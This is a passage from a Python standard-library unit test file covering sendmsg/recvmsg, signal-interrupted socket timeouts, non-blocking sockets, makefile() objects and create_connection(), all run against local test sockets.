class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
                                          RFC3542AncillaryTest,
                                          SendrecvmsgUDP6TestBase):
    """RFC 3542 ancillary-data tests using recvmsg_into() over IPv6 UDP."""
    pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
                             ConnectedStreamTestMixin, TCPTestBase):
    """Base for sendmsg()/recvmsg() tests over a connected TCP socket."""
    pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
    """sendmsg() tests over TCP."""
    pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
                     SendrecvmsgTCPTestBase):
    """recvmsg() tests over TCP."""
    pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
                         SendrecvmsgTCPTestBase):
    """recvmsg_into() tests over TCP."""
    pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
                                    SendrecvmsgConnectedBase,
                                    ConnectedStreamTestMixin, SCTPStreamBase):
    """Base for sendmsg()/recvmsg() tests over a connected SCTP stream."""
    pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
    """sendmsg() tests over an SCTP stream."""
    pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
                            SendrecvmsgSCTPStreamTestBase):
    """recvmsg() tests over an SCTP stream."""

    def testRecvmsgEOF(self):
        # Run the generic EOF test, but tolerate the sporadic ENOTCONN
        # some kernels raise on SCTP sockets (see issue #13876).
        try:
            # Zero-argument super() — consistent with the rest of this
            # file (e.g. InterruptedTimeoutBase.setUp).
            super().testRecvmsgEOF()
        except OSError as e:
            if e.errno != errno.ENOTCONN:
                raise
            self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
                                SendrecvmsgSCTPStreamTestBase):
    """recvmsg_into() tests over an SCTP stream."""

    def testRecvmsgEOF(self):
        # Run the generic EOF test, but tolerate the sporadic ENOTCONN
        # some kernels raise on SCTP sockets (see issue #13876).
        try:
            # Zero-argument super() — consistent with the rest of this
            # file (e.g. InterruptedTimeoutBase.setUp).
            super().testRecvmsgEOF()
        except OSError as e:
            if e.errno != errno.ENOTCONN:
                raise
            self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
                                    ConnectedStreamTestMixin, UnixStreamBase):
    """Base for sendmsg()/recvmsg() tests over a Unix stream socket."""
    pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
    """sendmsg() tests over a Unix stream socket."""
    pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
                            SendrecvmsgUnixStreamTestBase):
    """recvmsg() tests over a Unix stream socket."""
    pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
                                SendrecvmsgUnixStreamTestBase):
    """recvmsg_into() tests over a Unix stream socket."""
    pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
    """SCM_RIGHTS fd-passing tests using recvmsg()."""
    pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
                                     SendrecvmsgUnixStreamTestBase):
    """SCM_RIGHTS fd-passing tests using recvmsg_into()."""
    pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
    # Base class for interrupted send/receive tests. Installs a
    # SIGALRM handler that raises ZeroDivisionError (via 1 / 0), so a
    # delivered alarm is observable as that exception; the original
    # handler is restored on teardown.
    def setUp(self):
        super().setUp()
        orig_alrm_handler = signal.signal(signal.SIGALRM,
                                          lambda signum, frame: 1 / 0)
        self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
    # Timeout for socket operations
    timeout = 4.0
    # Provide setAlarm() method to schedule delivery of SIGALRM after
    # given number of seconds, or cancel it if zero, and an
    # appropriate time value to use. Use setitimer() if available.
    if hasattr(signal, "setitimer"):
        alarm_time = 0.05
        def setAlarm(self, seconds):
            signal.setitimer(signal.ITIMER_REAL, seconds)
    else:
        # Old systems may deliver the alarm up to one second early
        alarm_time = 2
        def setAlarm(self, seconds):
            # signal.alarm() only takes whole seconds.
            signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
                     "Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
    # Test interrupting the recv*() methods with signals when a
    # timeout is set.
    def setUp(self):
        super().setUp()
        self.serv.settimeout(self.timeout)

    def checkInterruptedRecv(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs) raises ZeroDivisionError
        # (propagated from the SIGALRM handler installed by
        # InterruptedTimeoutBase) when interrupted by a signal.
        # Note: the old comment claimed OSError/EINTR was expected,
        # which no longer matched the assertion below.
        try:
            self.setAlarm(self.alarm_time)
            # The unused "as cm" binding has been dropped.
            with self.assertRaises(ZeroDivisionError):
                func(*args, **kwargs)
        finally:
            # Always cancel any pending alarm.
            self.setAlarm(0)

    def testInterruptedRecvTimeout(self):
        self.checkInterruptedRecv(self.serv.recv, 1024)

    def testInterruptedRecvIntoTimeout(self):
        self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))

    def testInterruptedRecvfromTimeout(self):
        self.checkInterruptedRecv(self.serv.recvfrom, 1024)

    def testInterruptedRecvfromIntoTimeout(self):
        self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))

    @requireAttrs(socket.socket, "recvmsg")
    def testInterruptedRecvmsgTimeout(self):
        self.checkInterruptedRecv(self.serv.recvmsg, 1024)

    @requireAttrs(socket.socket, "recvmsg_into")
    def testInterruptedRecvmsgIntoTimeout(self):
        self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
                     "Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
                                 ThreadSafeCleanupTestCase,
                                 SocketListeningTestMixin, TCPTestBase):
    # Test interrupting the interruptible send*() methods with signals
    # when a timeout is set.
    def setUp(self):
        super().setUp()
        self.serv_conn = self.newSocket()
        self.addCleanup(self.serv_conn.close)
        # Use a thread to complete the connection, but wait for it to
        # terminate before running the test, so that there is only one
        # thread to accept the signal.
        cli_thread = threading.Thread(target=self.doConnect)
        cli_thread.start()
        self.cli_conn, addr = self.serv.accept()
        self.addCleanup(self.cli_conn.close)
        cli_thread.join()
        self.serv_conn.settimeout(self.timeout)

    def doConnect(self):
        # Runs in the helper thread: connect serv_conn to the listener.
        self.serv_conn.connect(self.serv_addr)

    def checkInterruptedSend(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs), run in a loop, raises
        # ZeroDivisionError (propagated from the SIGALRM handler
        # installed by InterruptedTimeoutBase) when interrupted by a
        # signal.  Note: the old comment claimed OSError/EINTR was
        # expected, which no longer matched the assertion below.
        try:
            # The unused "as cm" binding has been dropped.
            with self.assertRaises(ZeroDivisionError):
                while True:
                    self.setAlarm(self.alarm_time)
                    func(*args, **kwargs)
        finally:
            # Always cancel any pending alarm.
            self.setAlarm(0)

    # Issue #12958: The following tests have problems on OS X prior to 10.7
    @support.requires_mac_ver(10, 7)
    def testInterruptedSendTimeout(self):
        self.checkInterruptedSend(self.serv_conn.send, b"a"*512)

    @support.requires_mac_ver(10, 7)
    def testInterruptedSendtoTimeout(self):
        # Passing an actual address here as Python's wrapper for
        # sendto() doesn't allow passing a zero-length one; POSIX
        # requires that the address is ignored since the socket is
        # connection-mode, however.
        self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
                                  self.serv_addr)

    @support.requires_mac_ver(10, 7)
    @requireAttrs(socket.socket, "sendmsg")
    def testInterruptedSendmsgTimeout(self):
        self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
    """Closing the server end must be seen as EOF by the client, and
    close() must be safe to call repeatedly."""

    def testClose(self):
        conn, addr = self.serv.accept()
        conn.close()
        client = self.cli
        readable, _, _ = select.select([client], [], [], 1.0)
        self.assertEqual(readable, [client])
        # EOF: recv() on the client returns an empty byte string.
        self.assertEqual(client.recv(1), b'')
        # close() must be idempotent.
        conn.close()
        conn.close()

    def _testClose(self):
        self.cli.connect((HOST, self.port))
        time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
    """Sanity checks for socket.socketpair(): default attributes and
    simple bidirectional I/O."""

    def __init__(self, methodName='runTest'):
        SocketPairTest.__init__(self, methodName=methodName)

    def _check_defaults(self, sock):
        # Both ends should be stream sockets in the default family
        # (AF_UNIX where available, otherwise AF_INET) with protocol 0.
        self.assertIsInstance(sock, socket.socket)
        expected_family = (socket.AF_UNIX if hasattr(socket, 'AF_UNIX')
                           else socket.AF_INET)
        self.assertEqual(sock.family, expected_family)
        self.assertEqual(sock.type, socket.SOCK_STREAM)
        self.assertEqual(sock.proto, 0)

    def _testDefaults(self):
        self._check_defaults(self.cli)

    def testDefaults(self):
        self._check_defaults(self.serv)

    def testRecv(self):
        received = self.serv.recv(1024)
        self.assertEqual(received, MSG)

    def _testRecv(self):
        self.cli.send(MSG)

    def testSend(self):
        self.serv.send(MSG)

    def _testSend(self):
        received = self.cli.recv(1024)
        self.assertEqual(received, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
    """Tests for non-blocking mode and timeout handling on TCP sockets.

    self.event synchronizes the server and client threads so that the
    "would block" path is exercised before the peer acts.
    """
    def __init__(self, methodName='runTest'):
        self.event = threading.Event()
        ThreadedTCPSocketTest.__init__(self, methodName=methodName)
    def assert_sock_timeout(self, sock, timeout):
        # Check both the Python-level timeout/blocking state and, where
        # fcntl is available, the O_NONBLOCK flag on the underlying fd.
        self.assertEqual(self.serv.gettimeout(), timeout)
        blocking = (timeout != 0.0)
        self.assertEqual(sock.getblocking(), blocking)
        if fcntl is not None:
            # When a Python socket has a non-zero timeout, it's switched
            # internally to a non-blocking mode. Later, sock.sendall(),
            # sock.recv(), and other socket operations use a select() call and
            # handle EWOULDBLOCK/EAGAIN on all socket operations. That's how
            # timeouts are enforced.
            fd_blocking = (timeout is None)
            flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
            self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)
    def testSetBlocking(self):
        # Test setblocking() and settimeout() methods
        self.serv.setblocking(True)
        self.assert_sock_timeout(self.serv, None)
        self.serv.setblocking(False)
        self.assert_sock_timeout(self.serv, 0.0)
        self.serv.settimeout(None)
        self.assert_sock_timeout(self.serv, None)
        self.serv.settimeout(0)
        self.assert_sock_timeout(self.serv, 0)
        self.serv.settimeout(10)
        self.assert_sock_timeout(self.serv, 10)
        self.serv.settimeout(0)
        self.assert_sock_timeout(self.serv, 0)
    def _testSetBlocking(self):
        # No client-side action needed.
        pass
    @support.cpython_only
    def testSetBlocking_overflow(self):
        # Issue 15989: setblocking() with a value that overflows
        # an unsigned int must still mean "blocking".
        import _testcapi
        if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
            self.skipTest('needs UINT_MAX < ULONG_MAX')
        self.serv.setblocking(False)
        self.assertEqual(self.serv.gettimeout(), 0.0)
        self.serv.setblocking(_testcapi.UINT_MAX + 1)
        self.assertIsNone(self.serv.gettimeout())
    # Reuse the no-op client helper for the overflow test above.
    _testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
    @unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
                         'test needs socket.SOCK_NONBLOCK')
    @support.requires_linux_version(2, 6, 28)
    def testInitNonBlocking(self):
        # create a socket with SOCK_NONBLOCK
        self.serv.close()
        self.serv = socket.socket(socket.AF_INET,
                                  socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
        self.assert_sock_timeout(self.serv, 0)
    def _testInitNonBlocking(self):
        pass
    def testInheritFlagsBlocking(self):
        # bpo-7995: accept() on a listening socket with a timeout and the
        # default timeout is None, the resulting socket must be blocking.
        with socket_setdefaulttimeout(None):
            self.serv.settimeout(10)
            conn, addr = self.serv.accept()
            self.addCleanup(conn.close)
            self.assertIsNone(conn.gettimeout())
    def _testInheritFlagsBlocking(self):
        self.cli.connect((HOST, self.port))
    def testInheritFlagsTimeout(self):
        # bpo-7995: accept() on a listening socket with a timeout and the
        # default timeout is None, the resulting socket must inherit
        # the default timeout.
        default_timeout = 20.0
        with socket_setdefaulttimeout(default_timeout):
            self.serv.settimeout(10)
            conn, addr = self.serv.accept()
            self.addCleanup(conn.close)
            self.assertEqual(conn.gettimeout(), default_timeout)
    def _testInheritFlagsTimeout(self):
        self.cli.connect((HOST, self.port))
    def testAccept(self):
        # Testing non-blocking accept
        self.serv.setblocking(0)
        # connect() didn't start: non-blocking accept() fails
        start_time = time.monotonic()
        with self.assertRaises(BlockingIOError):
            conn, addr = self.serv.accept()
        dt = time.monotonic() - start_time
        self.assertLess(dt, 1.0)
        # Tell the client it may connect now.
        self.event.set()
        read, write, err = select.select([self.serv], [], [], MAIN_TIMEOUT)
        if self.serv not in read:
            self.fail("Error trying to do accept after select.")
        # connect() completed: non-blocking accept() doesn't block
        conn, addr = self.serv.accept()
        self.addCleanup(conn.close)
        self.assertIsNone(conn.gettimeout())
    def _testAccept(self):
        # don't connect before event is set to check
        # that non-blocking accept() raises BlockingIOError
        self.event.wait()
        self.cli.connect((HOST, self.port))
    def testRecv(self):
        # Testing non-blocking recv
        conn, addr = self.serv.accept()
        self.addCleanup(conn.close)
        conn.setblocking(0)
        # the peer didn't send data yet: non-blocking recv() fails
        with self.assertRaises(BlockingIOError):
            msg = conn.recv(len(MSG))
        # Tell the client it may send now.
        self.event.set()
        read, write, err = select.select([conn], [], [], MAIN_TIMEOUT)
        if conn not in read:
            self.fail("Error during select call to non-blocking socket.")
        # the peer sent data now: non-blocking recv() doesn't block
        msg = conn.recv(len(MSG))
        self.assertEqual(msg, MSG)
    def _testRecv(self):
        self.cli.connect((HOST, self.port))
        # don't send anything before event is set to check
        # that non-blocking recv() raises BlockingIOError
        self.event.wait()
        # send data: recv() will no longer block
        self.cli.sendall(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
    """Unit tests for the object returned by socket.makefile()

    self.read_file is the io object returned by makefile() on
    the client connection. You can read from this file to
    get output from the server.

    self.write_file is the io object returned by makefile() on the
    server connection. You can write to this file to send output
    to the client.
    """
    # Configuration knobs overridden by the subclasses below.
    bufsize = -1 # Use default buffer size
    encoding = 'utf-8'
    errors = 'strict'
    newline = None
    read_mode = 'rb'
    read_msg = MSG
    write_mode = 'wb'
    write_msg = MSG
    def __init__(self, methodName='runTest'):
        SocketConnectedTest.__init__(self, methodName=methodName)
    def setUp(self):
        # Events used to coordinate the server and client threads.
        self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
            threading.Event() for i in range(4)]
        SocketConnectedTest.setUp(self)
        self.read_file = self.cli_conn.makefile(
            self.read_mode, self.bufsize,
            encoding = self.encoding,
            errors = self.errors,
            newline = self.newline)
    def tearDown(self):
        # Unblock the client thread before closing the read side.
        self.serv_finished.set()
        self.read_file.close()
        self.assertTrue(self.read_file.closed)
        self.read_file = None
        SocketConnectedTest.tearDown(self)
    def clientSetUp(self):
        SocketConnectedTest.clientSetUp(self)
        self.write_file = self.serv_conn.makefile(
            self.write_mode, self.bufsize,
            encoding = self.encoding,
            errors = self.errors,
            newline = self.newline)
    def clientTearDown(self):
        self.cli_finished.set()
        self.write_file.close()
        self.assertTrue(self.write_file.closed)
        self.write_file = None
        SocketConnectedTest.clientTearDown(self)
    def testReadAfterTimeout(self):
        # Issue #7322: A file object must disallow further reads
        # after a timeout has occurred.
        self.cli_conn.settimeout(1)
        self.read_file.read(3)
        # First read raises a timeout
        self.assertRaises(socket.timeout, self.read_file.read, 1)
        # Second read is disallowed
        with self.assertRaises(OSError) as ctx:
            self.read_file.read(1)
        self.assertIn("cannot read from timed out object", str(ctx.exception))
    def _testReadAfterTimeout(self):
        # Send only 3 bytes so the server's second read times out.
        self.write_file.write(self.write_msg[0:3])
        self.write_file.flush()
        self.serv_finished.wait()
    def testSmallRead(self):
        # Performing small file read test
        first_seg = self.read_file.read(len(self.read_msg)-3)
        second_seg = self.read_file.read(3)
        msg = first_seg + second_seg
        self.assertEqual(msg, self.read_msg)
    def _testSmallRead(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()
    def testFullRead(self):
        # read until EOF
        msg = self.read_file.read()
        self.assertEqual(msg, self.read_msg)
    def _testFullRead(self):
        self.write_file.write(self.write_msg)
        # Closing the write side produces EOF on the reader.
        self.write_file.close()
    def testUnbufferedRead(self):
        # Performing unbuffered file read test
        buf = type(self.read_msg)()
        while 1:
            char = self.read_file.read(1)
            if not char:
                break
            buf += char
        self.assertEqual(buf, self.read_msg)
    def _testUnbufferedRead(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()
    def testReadline(self):
        # Performing file readline test
        line = self.read_file.readline()
        self.assertEqual(line, self.read_msg)
    def _testReadline(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()
    def testCloseAfterMakefile(self):
        # The file returned by makefile should keep the socket open.
        self.cli_conn.close()
        # read until EOF
        msg = self.read_file.read()
        self.assertEqual(msg, self.read_msg)
    def _testCloseAfterMakefile(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()
    def testMakefileAfterMakefileClose(self):
        # Closing the makefile() object must leave the socket usable.
        self.read_file.close()
        msg = self.cli_conn.recv(len(MSG))
        if isinstance(self.read_msg, str):
            msg = msg.decode()
        self.assertEqual(msg, self.read_msg)
    def _testMakefileAfterMakefileClose(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()
    def testClosedAttr(self):
        self.assertTrue(not self.read_file.closed)
    def _testClosedAttr(self):
        self.assertTrue(not self.write_file.closed)
    def testAttributes(self):
        # makefile() objects expose the mode and the socket's fileno as name.
        self.assertEqual(self.read_file.mode, self.read_mode)
        self.assertEqual(self.read_file.name, self.cli_conn.fileno())
    def _testAttributes(self):
        self.assertEqual(self.write_file.mode, self.write_mode)
        self.assertEqual(self.write_file.name, self.serv_conn.fileno())
    def testRealClose(self):
        self.read_file.close()
        self.assertRaises(ValueError, self.read_file.fileno)
        self.cli_conn.close()
        self.assertRaises(OSError, self.cli_conn.getsockname)
    def _testRealClose(self):
        pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
    """Repeat the tests from FileObjectClassTestCase with bufsize==0.

    In this case (and in this case only), it should be possible to
    create a file object, read a line from it, create another file
    object, read another line from it, without loss of data in the
    first file object's buffer. Note that http.client relies on this
    when reading multiple requests from the same socket."""
    bufsize = 0 # Use unbuffered mode
    def testUnbufferedReadline(self):
        # Read a line, create a new file object, read another line with it
        line = self.read_file.readline() # first line
        self.assertEqual(line, b"A. " + self.write_msg) # first line
        self.read_file = self.cli_conn.makefile('rb', 0)
        line = self.read_file.readline() # second line
        self.assertEqual(line, b"B. " + self.write_msg) # second line
    def _testUnbufferedReadline(self):
        self.write_file.write(b"A. " + self.write_msg)
        self.write_file.write(b"B. " + self.write_msg)
        self.write_file.flush()
    def testMakefileClose(self):
        # The file returned by makefile should keep the socket open...
        self.cli_conn.close()
        msg = self.cli_conn.recv(1024)
        self.assertEqual(msg, self.read_msg)
        # ...until the file is itself closed
        self.read_file.close()
        self.assertRaises(OSError, self.cli_conn.recv, 1024)
    def _testMakefileClose(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()
    def testMakefileCloseSocketDestroy(self):
        # Closing the file must drop its reference to the socket.
        refcount_before = sys.getrefcount(self.cli_conn)
        self.read_file.close()
        refcount_after = sys.getrefcount(self.cli_conn)
        self.assertEqual(refcount_before - 1, refcount_after)
    def _testMakefileCloseSocketDestroy(self):
        pass
    # Non-blocking ops
    # NOTE: to set `read_file` as non-blocking, we must call
    # `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
    def testSmallReadNonBlocking(self):
        self.cli_conn.setblocking(False)
        # No data available yet: reads return None instead of blocking.
        self.assertEqual(self.read_file.readinto(bytearray(10)), None)
        self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
        self.evt1.set()
        self.evt2.wait(1.0)
        first_seg = self.read_file.read(len(self.read_msg) - 3)
        if first_seg is None:
            # Data not arrived (can happen under Windows), wait a bit
            time.sleep(0.5)
            first_seg = self.read_file.read(len(self.read_msg) - 3)
        buf = bytearray(10)
        n = self.read_file.readinto(buf)
        self.assertEqual(n, 3)
        msg = first_seg + buf[:n]
        self.assertEqual(msg, self.read_msg)
        # Everything consumed: further reads return None again.
        self.assertEqual(self.read_file.readinto(bytearray(16)), None)
        self.assertEqual(self.read_file.read(1), None)
    def _testSmallReadNonBlocking(self):
        self.evt1.wait(1.0)
        self.write_file.write(self.write_msg)
        self.write_file.flush()
        self.evt2.set()
        # Avoid closing the socket before the server test has finished,
        # otherwise system recv() will return 0 instead of EWOULDBLOCK.
        self.serv_finished.wait(5.0)
    def testWriteNonBlocking(self):
        self.cli_finished.wait(5.0)
        # The client thread can't skip directly - the SkipTest exception
        # would appear as a failure.
        if self.serv_skipped:
            self.skipTest(self.serv_skipped)
    def _testWriteNonBlocking(self):
        self.serv_skipped = None
        self.serv_conn.setblocking(False)
        # Try to saturate the socket buffer pipe with repeated large writes.
        BIG = b"x" * support.SOCK_MAX_SIZE
        LIMIT = 10
        # The first write() succeeds since a chunk of data can be buffered
        n = self.write_file.write(BIG)
        self.assertGreater(n, 0)
        for i in range(LIMIT):
            n = self.write_file.write(BIG)
            if n is None:
                # Succeeded
                break
            self.assertGreater(n, 0)
        else:
            # Let us know that this test didn't manage to establish
            # the expected conditions. This is not a failure in itself but,
            # if it happens repeatedly, the test should be fixed.
            self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
    """Repeat the makefile() tests with bufsize == 1."""
    bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
    """Repeat the makefile() tests with a tiny buffer size."""
    bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
    """socket.makefile() tests: text-mode reads, binary-mode writes."""
    read_mode = 'r'
    read_msg = MSG.decode('utf-8')
    write_mode = 'wb'
    write_msg = MSG
    newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
    """socket.makefile() tests: binary-mode reads, text-mode writes."""
    read_mode = 'rb'
    read_msg = MSG
    write_mode = 'w'
    write_msg = MSG.decode('utf-8')
    newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
    """socket.makefile() tests: text mode for both reads and writes."""
    read_mode = 'r'
    read_msg = MSG.decode('utf-8')
    write_mode = 'w'
    write_msg = MSG.decode('utf-8')
    newline = ''
class NetworkConnectionTest(object):
    """Mixin whose client side connects via socket.create_connection()."""
    def clientSetUp(self):
        # We're inherited below by BasicTCPTest2, which also inherits
        # BasicTCPTest, which defines self.port referenced below.
        self.cli = socket.create_connection((HOST, self.port))
        self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
    """Tests that NetworkConnection does not break existing TCP functionality.
    """
class NetworkConnectionNoServer(unittest.TestCase):
    """Error behaviour of connect()/create_connection() when nothing is
    listening on the target port."""

    class MockSocket(socket.socket):
        # connect() always fails with a timeout, regardless of target.
        def connect(self, *args):
            raise socket.timeout('timed out')

    @contextlib.contextmanager
    def mocked_socket_module(self):
        """Temporarily replace socket.socket with MockSocket so every
        connect() attempt times out."""
        saved_socket_cls = socket.socket
        socket.socket = self.MockSocket
        try:
            yield
        finally:
            socket.socket = saved_socket_cls

    def test_connect(self):
        port = support.find_unused_port()
        cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.addCleanup(cli.close)
        with self.assertRaises(OSError) as ctx:
            cli.connect((HOST, port))
        self.assertEqual(ctx.exception.errno, errno.ECONNREFUSED)

    def test_create_connection(self):
        # Issue #9792: errors raised by create_connection() should have
        # a proper errno attribute.
        port = support.find_unused_port()
        with self.assertRaises(OSError) as ctx:
            socket.create_connection((HOST, port))

        # Issue #16257: create_connection() calls getaddrinfo() against
        # 'localhost'. This may result in an IPV6 addr being returned
        # as well as an IPV4 one:
        # >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
        # >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
        #       (26, 2, 0, '', ('::1', 41230, 0, 0))]
        #
        # create_connection() enumerates through all the addresses returned
        # and if it doesn't successfully bind to any of them, it propagates
        # the last exception it encountered.
        #
        # On Solaris, ENETUNREACH is returned in this circumstance instead
        # of ECONNREFUSED. So, if that errno exists, add it to our list of
        # expected errnos.
        expected_errnos = support.get_socket_conn_refused_errs()
        self.assertIn(ctx.exception.errno, expected_errnos)

    def test_create_connection_timeout(self):
        # Issue #9792: create_connection() should not recast timeout errors
        # as generic socket errors.
        with self.mocked_socket_module():
            with self.assertRaises(socket.timeout):
                socket.create_connection((HOST, 1234))
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
    """Attribute and timeout behaviour of socket.create_connection().

    The server side of each test is the shared _justAccept() helper
    (aliased below as testX = _justAccept); the real assertions live in
    the client-side _testX methods.
    """
    def __init__(self, methodName='runTest'):
        SocketTCPTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)
    def clientSetUp(self):
        self.source_port = support.find_unused_port()
    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
    def _justAccept(self):
        # Server side: accept one connection and drop it immediately.
        conn, addr = self.serv.accept()
        conn.close()
    testFamily = _justAccept
    def _testFamily(self):
        self.cli = socket.create_connection((HOST, self.port), timeout=30)
        self.addCleanup(self.cli.close)
        # 2 == socket.AF_INET
        self.assertEqual(self.cli.family, 2)
    testSourceAddress = _justAccept
    def _testSourceAddress(self):
        self.cli = socket.create_connection((HOST, self.port), timeout=30,
                source_address=('', self.source_port))
        self.addCleanup(self.cli.close)
        self.assertEqual(self.cli.getsockname()[1], self.source_port)
        # The port number being used is sufficient to show that the bind()
        # call happened.
    testTimeoutDefault = _justAccept
    def _testTimeoutDefault(self):
        # passing no explicit timeout uses socket's global default
        self.assertTrue(socket.getdefaulttimeout() is None)
        socket.setdefaulttimeout(42)
        try:
            self.cli = socket.create_connection((HOST, self.port))
            self.addCleanup(self.cli.close)
        finally:
            # Always restore the global default for later tests.
            socket.setdefaulttimeout(None)
        self.assertEqual(self.cli.gettimeout(), 42)
    testTimeoutNone = _justAccept
    def _testTimeoutNone(self):
        # None timeout means the same as sock.settimeout(None)
        self.assertTrue(socket.getdefaulttimeout() is None)
        socket.setdefaulttimeout(30)
        try:
            self.cli = socket.create_connection((HOST, self.port), timeout=None)
            self.addCleanup(self.cli.close)
        finally:
            # Always restore the global default for later tests.
            socket.setdefaulttimeout(None)
        self.assertEqual(self.cli.gettimeout(), None)
    testTimeoutValueNamed = _justAccept
    def _testTimeoutValueNamed(self):
        # self.cli is closed by clientTearDown().
        self.cli = socket.create_connection((HOST, self.port), timeout=30)
        self.assertEqual(self.cli.gettimeout(), 30)
    testTimeoutValueNonamed = _justAccept
    def _testTimeoutValueNonamed(self):
        self.cli = socket.create_connection((HOST, self.port), 30)
        self.addCleanup(self.cli.close)
        self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
    """Behaviour of sockets from socket.create_connection(): a recv()
    that completes within the timeout succeeds, one past it raises."""

    def __init__(self, methodName='runTest'):
        SocketTCPTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)

    def clientSetUp(self):
        pass

    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)

    def testInsideTimeout(self):
